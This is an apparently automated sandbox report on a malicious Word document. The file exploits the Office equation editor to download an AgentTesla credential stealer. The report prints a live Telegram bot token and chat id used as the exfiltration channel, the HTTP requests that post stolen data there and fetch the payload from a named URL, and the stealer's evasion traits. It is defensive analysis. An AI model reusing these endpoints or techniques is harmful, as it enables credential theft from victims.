
Windows Analysis Report Purchase Order_0131021.doc

Overview

General Information

Sample Name: Purchase Order_0131021.doc
Analysis ID: 502700
MD5: fc66be4a9696798aff0be8ed97bd294f
SHA1: cf158b670ec831531a233d41872d1a9ee3850ff1
SHA256: 8ad456fc82b1c617f362b0356e6273ca6952368d3478f3f11c55e7c968158a15
Tags: doc

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Binary or sample is protected by dotNetProtector
Injects a PE file into a foreign processes
Office equation editor drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 236 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 512 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • gudostrp.exe (PID: 1212 cmdline: C:\Users\user\AppData\Roaming\gudostrp.exe MD5: BC5F0AA0262021DB5921D726F7A5B820)
      • gudostrp.exe (PID: 2576 cmdline: C:\Users\user\AppData\Roaming\gudostrp.exe MD5: BC5F0AA0262021DB5921D726F7A5B820)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1366706404", "Chat URL": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(5 of 8 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.gudostrp.exe.400000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
5.2.gudostrp.exe.400000.1.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
4.2.gudostrp.exe.31ca110.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
4.2.gudostrp.exe.31ca110.2.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
4.2.gudostrp.exe.3200330.1.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 144.76.47.167, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 512, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 512, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\user\AppData\Roaming\gudostrp.exe, CommandLine: C:\Users\user\AppData\Roaming\gudostrp.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\gudostrp.exe, NewProcessName: C:\Users\user\AppData\Roaming\gudostrp.exe, OriginalFileName: C:\Users\user\AppData\Roaming\gudostrp.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 512, ProcessCommandLine: C:\Users\user\AppData\Roaming\gudostrp.exe, ProcessId: 1212

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 5.2.gudostrp.exe.400000.1.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1366706404", "Chat URL": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument"}
Source: gudostrp.exe.2576.5.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendMessage"}
Multi AV Scanner detection for submitted file
Source: Purchase Order_0131021.doc | Virustotal: Detection: 36%
Source: Purchase Order_0131021.doc | ReversingLabs: Detection: 35%
Antivirus detection for URL or domain
Source: http://palangavra.lt/jukiestay/gufoxqa.exe | Avira URL Cloud: Label: malware
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\gudostrp.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: global traffic | DNS query: name: palangavra.lt
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 144.76.47.167:80
Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 149.154.167.220:443

Networking:

Uses the Telegram API (likely for C&C communication)
Source: unknown | DNS query: name: api.telegram.org
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
Source: Joe Sandbox View | JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Source: global traffic | HTTP traffic detected:
  POST /bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------8d98f225cfe8da2
  Host: api.telegram.org
  Content-Length: 1018
  Expect: 100-continue
  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Thu, 14 Oct 2021 08:22:59 GMT
  Server: Apache
  Upgrade: h2,h2c
  Connection: Upgrade, Keep-Alive
  Last-Modified: Thu, 14 Oct 2021 01:10:12 GMT
  Accept-Ranges: bytes
  Content-Length: 486912
  Keep-Alive: timeout=5, max=100
  Content-Type: application/x-msdownload
Source: global traffic | HTTP traffic detected:
  GET /jukiestay/gufoxqa.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: palangavra.lt
  Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 443
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: gudostrp.exe, 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp | String found in binary or memory: http://SwonTwAJYn3XCAV3.net
Source: gudostrp.exe, 00000005.00000002.722444907.00000000023FF000.00000004.00000001.sdmp | String found in binary or memory: http://api.telegram.org
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: gudostrp.exe, 00000005.00000002.723083857.00000000060F3000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp | String found in binary or memory: http://yBlQIu.com
Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org
Source: gudostrp.exe, 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, gudostrp.exe, 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/
Source: gudostrp.exe, 00000005.00000002.722105371.0000000000788000.00000004.00000020.sdmp, gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocumentdocument-----
Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.orgP
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: gudostrp.exe, 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, gudostrp.exe, 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | HTTP traffic detected:
  POST /bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------8d98f225cfe8da2
  Host: api.telegram.org
  Content-Length: 1018
  Expect: 100-continue
  Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FF3D13C6-F9AF-46D5-857E-918FB2A2DE9E}.tmp
Source: unknown | DNS traffic detected: queries for: palangavra.lt
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\gudostrp.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe
.NET source code contains very large array initializations
Source: 5.2.gudostrp.exe.400000.1.unpack, <PrivateImplementationDetails>{CB2C1C74-7A68-46F5-B599-45991AE15A88}/A406E5E7-DEBA-4106-AAAE-B593294D8F00.cs | Large array initialization: .cctor: array initializer size 12005
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 4_2_00726CD0 CreateProcessAsUserW
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Memory allocated: 76E90000 page execute and read and write
Source: Purchase Order_0131021.doc | Virustotal: Detection: 36%
Source: Purchase Order_0131021.doc | ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$rchase Order_0131021.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD1AF.tmp
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winDOC@6/9@3/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: 5.2.gudostrp.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.2.gudostrp.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Data Obfuscation:

Binary or sample is protected by dotNetProtector
Source: gudostrp.exe, gufoxqa[1].exe.2.dr -- String found in binary or memory: dotNetProtector
Source: gudostrp.exe (00000004.00000002.462296022.00000000001D2000.00000020.00020000.sdmp, 00000005.00000002.721799916.00000000001D2000.00000020.00020000.sdmp), gufoxqa[1].exe.2.dr -- String found in binary or memory: kIHasFieldMarshalReplaceInternalJoinInternalSet_IsLiteralAppCompatLiteralGet_IsInternalCalladvapi32.dllkernel32.dllKillEcmaPublicKeyFullSet_PercentSymbolChangeAccessControlBlobStreamInternalLoadFromStreamCryptoStreamMemoryStreamSystemSymmetricAlgorithmHashAlgorithmFormICryptoTransformGet_InGet_IsAddOnTanConvertHijriToGregorianStrLenget_MetadataTokenResolveTokenAssignCancellationTokenlpNumberOfBytesWrittenEndStrongNameSignBeginStrongNameSignSinAppDomainget_CurrentDomainGet_EndColumnGet_RevisionApplicationget_LocationOp_UnaryNegationNineRays.Obfuscator.EvaluationNoOptimizationSystem.ReflectionGetBaseDefinitionGenericParameterPositionCallingConventionRuntimeWrappedExceptionEncoderFallbackExceptionRunGetDynamicILInfoRslvMethodFieldInfoEhEndFinallyFieldInfoMethodInfo_compareInfoMemberInfoParameterInfoDelegateCtorInfoZeroGet_IsCharSetAutoAlignUpGetInterfaceMapInitializeEventMapGet_BlobHeapTablesHeapSleepSystem.Linqset_ShowInTaskbarGet_DefaultCalendarFirstGregorianTableYearMoveRightGetCharGet_CurrentCharGet_ParamNumberGet_ManagedNativeHeaderWriteTinyHeaderGetBlobReaderSyncTextReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderM_lastBlockBufferlpBufferResourceManagerDebuggerSet_IsOtherget_IsModifierWSTRBufferMarshalerAddOneArgTypeHelperCheckHelperCreateAttributeArrayHelperCreateProcessAsUserget_IsPointerBitConverterResolverModuleDirGetTokenForFloorSetLastErrorIEnumeratorInitializeTypeEnumeratorGetEnumerator.ctorLoadFactor.cctordotNetProtectorget_IsConstructorCreateDecryptorFromIntPtrBuildRevisionStr/
This is the packer's concatenated metadata string table; besides 'dotNetProtector' it contains 'NineRays.Obfuscator.Evaluation' (dotNetProtector is a 9Rays product, and this marker points to an evaluation build) together with the runtime-loading and decryption names it relies on ('GetDynamicILInfo', 'AssemblyBuilder', 'DESCryptoServiceProvider', 'CreateDecryptor').
Source: C:\Users\user\AppData\Roaming\gudostrp.exe -- Code functions using push/ret and push/iret sequences instead of direct calls (function start, instruction pair, address of the return):
4_2_001DEB0F push esp; iretd (4_2_001DEF9A)
4_2_001D67F6 pushfd; iretd (4_2_001D67FB)
4_2_0030DE0D pushfd; iretd (4_2_0030DE1E)
4_2_0030DB73 push esp; iretd (4_2_0030DB95)
4_2_01FA5275 push ebx; iretd (4_2_01FA5276)
4_2_01FB4FE7 push ebx; ret (4_2_01FB501A)
4_2_01FB504D push ebp; retf (4_2_01FB504E)
4_2_01FB4FBE push ebx; ret (4_2_01FB501A)
4_2_01FBA412 pushad; retf (4_2_01FBA41E)
4_2_01FCB713 pushad; iretd (4_2_01FCB723)
4_2_02035645 pushad; ret (4_2_02035655)
4_2_041D561B push eax; retf (4_2_041D5626)
4_2_041D7CC7 push ebx; ret (4_2_041D7CCA)
4_2_041D5901 pushad; ret (4_2_041D5902)
5_2_001DEB0F push esp; iretd (5_2_001DEF9A)
5_2_001D67F6 pushfd; iretd (5_2_001D67FB)
5_2_002530B5 push esp; retf 0012h (5_2_00253105)
5_2_00251B15 push esp; retf 0012h (5_2_00251B69)
5_2_0055626C pushfd; retf 0018h (5_2_0055626D)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE -- File created (dropped file): C:\Users\user\AppData\Roaming\gudostrp.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE -- File created (dropped file): C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe
Source: C:\Users\user\AppData\Roaming\gudostrp.exe -- Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE -- Process information set: NOOPENFILEERRORBOX (34 occurrences)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE -- Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (17 occurrences)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE -- Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Users\user\AppData\Roaming\gudostrp.exe -- Process information set: NOOPENFILEERRORBOX (75 occurrences)

Malware Analysis System Evasion:

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\gudostrp.exe -- WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\gudostrp.exe -- WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, TID 408 -- Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Roaming\gudostrp.exe, TID 2916 -- Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Roaming\gudostrp.exe, TID 2364 -- Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Roaming\gudostrp.exe, TID 2364 -- Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Roaming\gudostrp.exe, TID 2096 -- Thread sleep count: 9569 > 30
Source: C:\Users\user\AppData\Roaming\gudostrp.exe, TID 2096 -- Thread sleep count: 171 > 30
Source: C:\Users\user\AppData\Roaming\gudostrp.exe, TID 2364 -- Thread sleep count: 105 > 30
Source: C:\Users\user\AppData\Roaming\gudostrp.exe -- Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\gudostrp.exe -- Thread delayed: delay time: 922337203685477 (2 occurrences)
The value 922337203685477 is Int64.MaxValue in 100-nanosecond ticks converted to milliseconds, i.e. .NET's TimeSpan.MaxValue: the thread is parked for an effectively infinite wait, not a timed sleep, which is why sandbox sleep-skipping does not move it along.
Source: C:\Users\user\AppData\Roaming\gudostrp.exe -- Window / User API: threadDelayed 9569
Source: C:\Users\user\AppData\Roaming\gudostrp.exe -- WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\gudostrp.exe -- WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor (2 occurrences)
Source: C:\Users\user\AppData\Roaming\gudostrp.exe -- Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\gudostrp.exe -- Thread delayed: delay time: 30000

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\gudostrp.exe -- Code function: 4_2_041DCAE8 CheckRemoteDebuggerPresent (4_2_041DCAE8)
Source: C:\Users\user\AppData\Roaming\gudostrp.exe -- Process token adjusted: Debug (2 occurrences)
Source: C:\Users\user\AppData\Roaming\gudostrp.exe -- Process queried: DebugPort
CheckRemoteDebuggerPresent is implemented on top of NtQueryInformationProcess(ProcessDebugPort), so the 'Process queried: DebugPort' entry is the same check observed at the syscall level, not a second technique.
Source: C:\Users\user\AppData\Roaming\gudostrp.exe -- Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Memory written: C:\Users\user\AppData\Roaming\gudostrp.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmp | Binary or memory string: !Progman
Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Queries volume information: C:\Users\user\AppData\Roaming\gudostrp.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Queries volume information: C:\Users\user\AppData\Roaming\gudostrp.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
